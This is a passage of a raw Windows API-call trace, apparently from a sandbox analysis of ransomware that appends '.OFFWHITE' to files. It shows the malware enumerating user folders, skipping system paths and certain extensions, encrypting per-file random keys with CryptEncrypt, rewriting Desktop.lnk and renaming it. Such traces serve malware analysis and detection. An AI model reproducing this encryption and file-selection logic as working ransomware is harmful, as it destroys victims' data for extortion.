lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="appdata") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="program files") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="program files (x86)") returned 1 [0134.420] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0134.420] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Windows Live Gallery.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" [0134.420] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.420] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.420] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0134.420] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.420] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.420] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.420] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.420] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.420] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.420] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.420] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.420] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.420] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2=".") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="..") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="...") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="windows") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="$recycle.bin") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="rsa") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="ntuser.dat") returned 1 [0134.420] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="programdata") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="appdata") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="program files") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="program files (x86)") returned 1 [0134.421] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0134.421] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Windows Live Mail.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" [0134.421] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.421] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.421] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0134.421] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.421] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.421] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.421] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.421] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.421] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.421] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.421] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.421] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.421] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2=".") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="..") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="...") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="windows") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="$recycle.bin") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="rsa") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="ntuser.dat") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="programdata") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="appdata") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="program files") returned 1 [0134.421] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="program files (x86)") returned 1 [0134.421] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0134.421] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Windows Live Spaces.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" [0134.421] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.421] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.422] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0134.422] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.422] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.422] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.422] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.422] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.422] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.422] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.422] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.422] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.422] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0134.422] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0134.423] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0134.423] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0134.423] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Links", cAlternateFileName="")) returned 1 [0134.423] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="...") returned 1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="$recycle.bin") returned 1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="rsa") returned -1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="ntuser.dat") returned -1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="programdata") returned -1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="appdata") returned 1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="program files") returned -1 [0134.423] lstrcmpiW (lpString1="Links", lpString2="program files (x86)") returned -1 [0134.423] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0134.423] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Links" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links" [0134.423] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0134.423] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0134.423] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0134.423] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0134.426] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.426] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0134.426] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.427] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.427] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0134.427] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0134.427] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0134.427] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" [0134.427] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.427] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.427] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0134.427] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0134.427] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0134.427] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0134.428] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0134.428] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0134.428] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0134.428] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0134.428] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="...") returned 1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="windows") returned -1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="$recycle.bin") returned 1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="rsa") returned -1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ntuser.dat") returned -1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="programdata") returned -1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="appdata") returned 1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="program files") returned -1 [0134.428] lstrcmpiW (lpString1="Desktop.lnk", lpString2="program files (x86)") returned -1 [0134.428] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0134.428] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="Desktop.lnk" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" [0134.428] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.428] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.428] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0134.428] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0134.428] lstrcmpiW (lpString1=".lnk", lpString2=".log") returned -1 [0134.428] lstrcmpiW (lpString1=".lnk", lpString2=".cab") returned 1 [0134.428] lstrcmpiW (lpString1=".lnk", lpString2=".cmd") returned 1 [0134.428] lstrcmpiW (lpString1=".lnk", lpString2=".com") returned 1 [0134.428] lstrcmpiW (lpString1=".lnk", lpString2=".cpl") returned 1 [0134.428] lstrcmpiW (lpString1=".lnk", lpString2=".ini") returned 1 [0134.428] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0134.428] lstrcmpiW (lpString1=".lnk", lpString2=".url") returned -1 [0134.429] lstrcmpiW (lpString1=".lnk", lpString2=".ttf") returned -1 [0134.429] lstrcmpiW (lpString1=".lnk", lpString2=".mp3") returned -1 [0134.429] lstrcmpiW (lpString1=".lnk", lpString2=".pif") returned -1 [0134.429] lstrcmpiW (lpString1=".lnk", lpString2=".mp4") returned -1 [0134.429] lstrcmpiW (lpString1=".lnk", lpString2=".OFFWHITE") returned -1 [0134.429] lstrcmpiW (lpString1=".lnk", lpString2=".msi") returned -1 [0134.429] lstrcmpiW (lpString1="Desktop.lnk", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.429] GetProcessHeap () returned 0x500000 [0134.429] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531770 [0134.429] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.470] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=486) returned 1 [0134.470] GetProcessHeap () returned 0x500000 [0134.470] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.470] GetProcessHeap () returned 0x500000 [0134.470] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.470] GetProcessHeap () returned 0x500000 [0134.470] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.470] GetProcessHeap () returned 0x500000 [0134.470] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.470] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.470] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.470] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.470] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.470] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.470] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.470] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.470] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.470] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.471] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.471] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.471] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.471] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.472] SetLastError (dwErrCode=0x0) [0134.472] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.473] GetLastError () returned 0x0 [0134.473] GetLastError () returned 0x0 [0134.473] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.473] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.473] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.473] WriteFile (in: hFile=0xb0, lpBuffer=0x531770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x531770*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.474] GetProcessHeap () returned 0x500000 [0134.474] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e6) returned 0x52b858 [0134.474] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.474] ReadFile (in: hFile=0xb0, lpBuffer=0x52b858, nNumberOfBytesToRead=0x1e6, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52b858*, lpNumberOfBytesRead=0x295e540*=0x1e6, lpOverlapped=0x0) returned 1 [0134.474] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.474] WriteFile (in: hFile=0xb0, lpBuffer=0x52b858*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52b858*, lpNumberOfBytesWritten=0x295e54c*=0x1e6, lpOverlapped=0x0) returned 1 [0134.474] GetProcessHeap () returned 0x500000 [0134.474] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52b858 | out: hHeap=0x500000) returned 1 [0134.474] CloseHandle (hObject=0xb0) returned 1 [0134.481] GetProcessHeap () returned 0x500000 [0134.481] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.481] GetProcessHeap () returned 0x500000 [0134.481] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.481] GetProcessHeap () returned 0x500000 [0134.481] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.481] GetProcessHeap () returned 0x500000 [0134.481] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.481] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" [0134.481] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.OFFWHITE" [0134.481] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.offwhite")) returned 1 [0134.482] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2=".") returned 1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2="..") returned 1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2="...") returned 1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2="windows") returned -1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2="$recycle.bin") returned 1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2="rsa") returned -1 [0134.482] lstrcmpiW (lpString1="Downloads.lnk", lpString2="ntuser.dat") returned -1 [0134.482] lstrcmpiW 